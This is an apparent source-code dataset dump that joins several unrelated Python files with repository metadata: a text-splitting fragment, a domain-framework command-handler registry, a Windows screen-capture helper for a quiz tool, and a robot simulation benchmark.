        last_split_idx = 0
        for split in sentence_boundary.finditer(line):
            sentence = line[last_split_idx: split.start() + 1]
            if len(sentence.split(" ")) >= 5:  # drop very short sentences
                sentences.append(sentence)
            last_split_idx = split.start() + 2
    sentence_splitted_by_max_words = []
    for sentence in sentences:
        words = sentence.split(" ")
        # Full chunks of exactly max_words words...
        for i in range(len(words) // max_words):
            begin = i * max_words
            end = (i + 1) * max_words
            sentence_splitted_by_max_words.append(" ".join(words[begin:end]))
        # ...plus one final, shorter chunk for the remainder.
        if len(words) % max_words != 0:
            begin = (len(words) // max_words) * max_words
            end = begin + (len(words) % max_words)
            sentence_splitted_by_max_words.append(" ".join(words[begin:end]))
    return sentence_splitted_by_max_words
0c51ba6c79548338d911c506b0cadf274268e327 | 3,102 | py | Python | src/protean/core/command_handler.py | mpsiva89/protean | 315fa56da3f64178bbbf0edf1995af46d5eb3da7 | [
"BSD-3-Clause"
] | null | null | null | src/protean/core/command_handler.py | mpsiva89/protean | 315fa56da3f64178bbbf0edf1995af46d5eb3da7 | [
"BSD-3-Clause"
] | null | null | null | src/protean/core/command_handler.py | mpsiva89/protean | 315fa56da3f64178bbbf0edf1995af46d5eb3da7 | [
"BSD-3-Clause"
] | null | null | null | import inspect
from protean.container import Element, OptionsMixin
from protean.core.command import BaseCommand
from protean.exceptions import IncorrectUsageError, NotSupportedError
from protean.utils import DomainObjects, derive_element_class, fully_qualified_name
from protean.utils.mixins import HandlerMixin
class BaseCommandHandler(Element, HandlerMixin, OptionsMixin):
"""Base Command Handler class that should implemented by all Domain CommandHandlers.
This is also a marker class that is referenced when command handlers are registered
with the domain
"""
element_type = DomainObjects.COMMAND_HANDLER
@classmethod
def _default_options(cls):
return [("aggregate_cls", None)]
def __new__(cls, *args, **kwargs):
if cls is BaseCommandHandler:
raise TypeError("BaseCommandHandler cannot be instantiated")
return super().__new__(cls)
def command_handler_factory(element_cls, **kwargs):
element_cls = derive_element_class(element_cls, BaseCommandHandler, **kwargs)
if not element_cls.meta_.aggregate_cls:
raise IncorrectUsageError(
{
"_entity": [
f"Command Handler `{element_cls.__name__}` needs to be associated with an Aggregate"
]
}
)
# Iterate through methods marked as `@handle` and construct a handler map
if not element_cls._handlers: # Protect against re-registration
methods = inspect.getmembers(element_cls, predicate=inspect.isroutine)
for method_name, method in methods:
if not (
method_name.startswith("__") and method_name.endswith("__")
) and hasattr(method, "_target_cls"):
# Do not allow multiple handlers per command
if (
fully_qualified_name(method._target_cls) in element_cls._handlers
and len(
element_cls._handlers[fully_qualified_name(method._target_cls)]
)
!= 0
):
raise NotSupportedError(
f"Command {method._target_cls.__name__} cannot be handled by multiple handlers"
)
# `_handlers` maps the command to its handler method
element_cls._handlers[fully_qualified_name(method._target_cls)].add(
method
)
# Associate Command with the handler's stream
if inspect.isclass(method._target_cls) and issubclass(
method._target_cls, BaseCommand
):
# Order of preference:
# 1. Stream name defined in command
# 2. Stream name derived from aggregate associated with command handler
method._target_cls.meta_.stream_name = (
method._target_cls.meta_.stream_name
or element_cls.meta_.aggregate_cls.meta_.stream_name
)
return element_cls
| 39.769231 | 104 | 0.618956 |
6e4269d20691bbcaf70cd315b27ff53c65700a19 | 2,161 | py | Python | core/windows.py | 9526xu/wenda-helper | ee61f480da42002f53345529d0c37f6fb122a3a2 | [
"MIT"
] | 2 | 2019-12-13T06:31:38.000Z | 2020-03-17T07:20:57.000Z | core/windows.py | 9526xu/wenda-helper | ee61f480da42002f53345529d0c37f6fb122a3a2 | [
"MIT"
] | 5 | 2021-03-18T20:24:53.000Z | 2022-01-13T00:42:04.000Z | core/windows.py | 9526xu/wenda-helper | ee61f480da42002f53345529d0c37f6fb122a3a2 | [
"MIT"
] | 3 | 2018-03-15T05:25:38.000Z | 2020-10-13T04:09:11.000Z | # -*- coding: utf-8 -*-
"""
capture the VM screen
then use hanwang text recognize the text
then use baidu to search answer
"""
import ctypes
import os
import time
import win32gui
import win32com.client
import win32con
from PIL import Image, ImageGrab
class RECT(ctypes.Structure):
    """ctypes mirror of the Win32 RECT struct: four C longs giving the
    window's left/top/right/bottom screen coordinates."""

    _fields_ = [
        ("left", ctypes.c_long),
        ("top", ctypes.c_long),
        ("right", ctypes.c_long),
        ("bottom", ctypes.c_long),
    ]

    def __str__(self):
        # Render as the plain tuple form, e.g. "(0, 0, 800, 600)".
        corners = (self.left, self.top, self.right, self.bottom)
        return str(corners)
def analyze_current_screen_text(label, directory="."):
    """
    Capture the window titled *label*, crop out the text area, and return
    the cropped image bytes.  Prints a warning and returns None when the
    window cannot be found.

    :param label: exact window title to look for
    :param directory: folder where intermediate images are written
    """
    hwnd = win32gui.FindWindow(None, label)
    if hwnd <= 0:
        # Window not open: warn the user and fall through (returns None).
        print('咦,你没打开' + label + '吧!')
        return
    screenshot_path = os.path.join(directory, "screenshot.png")
    text_area_path = os.path.join(directory, "text_area.png")
    capture_screen(hwnd, "screenshot.png", directory)
    parse_answer_area(screenshot_path, text_area_path)
    return get_area_data(text_area_path)
def capture_screen(hld, filename="screenshot.png", directory="."):
    """
    Restore window *hld*, bring it to the foreground, and save a
    screenshot of its on-screen rectangle.

    :param hld: Win32 window handle to capture
    :param filename: name of the output image file
    :param directory: folder the image is saved into
    """
    win32gui.ShowWindow(hld, win32con.SW_RESTORE)
    # '%' is ALT in WScript SendKeys syntax — presumably sent so that
    # SetForegroundWindow is allowed to succeed; TODO confirm on target OS.
    shell = win32com.client.Dispatch("WScript.Shell")
    shell.SendKeys('%')
    win32gui.SetForegroundWindow(hld)
    # Give the window a moment to come to the front before grabbing it.
    time.sleep(1)
    bounds = RECT()
    ctypes.windll.user32.GetWindowRect(hld, ctypes.byref(bounds))
    box = (bounds.left, bounds.top, bounds.right, bounds.bottom)
    grabbed = ImageGrab.grab(box)
    grabbed.save(os.path.join(directory, filename))
def parse_answer_area(source_file, text_area_file):
    """
    Crop the text region out of a full screenshot and save it.

    :param source_file: path of the full screenshot image
    :param text_area_file: path where the cropped region is written
    """
    # Use the context manager so the source image's file handle is
    # closed promptly instead of leaking until garbage collection.
    with Image.open(source_file) as image:
        wide = image.size[0]
        # Crop band: full width, rows 100-500 — presumably where the
        # question/answer text appears on screen; TODO confirm offsets.
        region = image.crop((0, 100, wide, 500))
        region.save(text_area_file)
def get_area_data(text_area_file):
    """
    Read the cropped text-area image and return its raw bytes.

    :param text_area_file: path of the image file to read
    :return: the file's content as bytes
    :raises OSError: if the file cannot be opened or read
    """
    # The original trailing `return ""` was unreachable dead code (the
    # with-block always returns or raises), so it has been removed.
    with open(text_area_file, "rb") as fp:
        return fp.read()
e809fa3da29481d331bcc8c16cfde7a471689892 | 2,082 | py | Python | controllers/tests/benchmark/benchmark.py | neuroailab/magnebot | 3f537fcd95685efeadf7200208a310a4c6a2f10c | [
"MIT"
] | null | null | null | controllers/tests/benchmark/benchmark.py | neuroailab/magnebot | 3f537fcd95685efeadf7200208a310a4c6a2f10c | [
"MIT"
] | null | null | null | controllers/tests/benchmark/benchmark.py | neuroailab/magnebot | 3f537fcd95685efeadf7200208a310a4c6a2f10c | [
"MIT"
] | null | null | null | from typing import List
from time import time
from magnebot.test_controller import TestController
class Benchmark(TestController):
    """
    Run simple benchmarks for the average speed of an action.
    In an actual use-case, the action will usually be somewhat slower because of the complexity of the scene.
    """

    def __init__(self, port: int = 1071, screen_width: int = 256, screen_height: int = 256):
        super().__init__(port=port, screen_height=screen_height, screen_width=screen_width)
        # Disable debug output while benchmarking.
        self._debug = False

    def move_fps(self) -> float:
        """
        Benchmark the speed of `move_by()`.

        :return: The average time elapsed per action.
        """
        self.init_scene()
        return self._get_move_fps()

    def turn_fps(self) -> float:
        """
        Benchmark the speed of `turn_by()`.

        :return: The average time elapsed per action.
        """
        self.init_scene()
        samples: List[float] = []
        for _ in range(20):
            start = time()
            self.turn_by(45)
            samples.append(time() - start)
        return sum(samples) / len(samples)

    def step_fps(self) -> None:
        """Print a Markdown table of move timings for several skipped-frame settings."""
        print("| Skipped frames | Time elapsed |\n| --- | --- |")
        for skipped in (0, 5, 10, 15, 20):
            self.init_scene()
            self._skip_frames = skipped
            elapsed = self._get_move_fps()
            print(f"| {skipped} | {elapsed} |")

    def _get_move_fps(self) -> float:
        """
        Move backwards and forwards and get the average time elapsed per action.

        :return: The average time elapsed of the action.
        """
        samples: List[float] = []
        sign = 1
        for i in range(20):
            # Flip direction every 5 moves so the robot oscillates near its start.
            if i > 0 and i % 5 == 0:
                sign *= -1
            start = time()
            self.move_by(0.5 * sign)
            samples.append(time() - start)
        return sum(samples) / len(samples)
if __name__ == "__main__":
    # Run each benchmark in turn, then shut the controller down cleanly.
    benchmark = Benchmark()
    print(f"turn_by(): {benchmark.turn_fps()}")
    print(f"move_by(): {benchmark.move_fps()}")
    benchmark.step_fps()
    benchmark.end()
| 27.76 | 109 | 0.561479 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.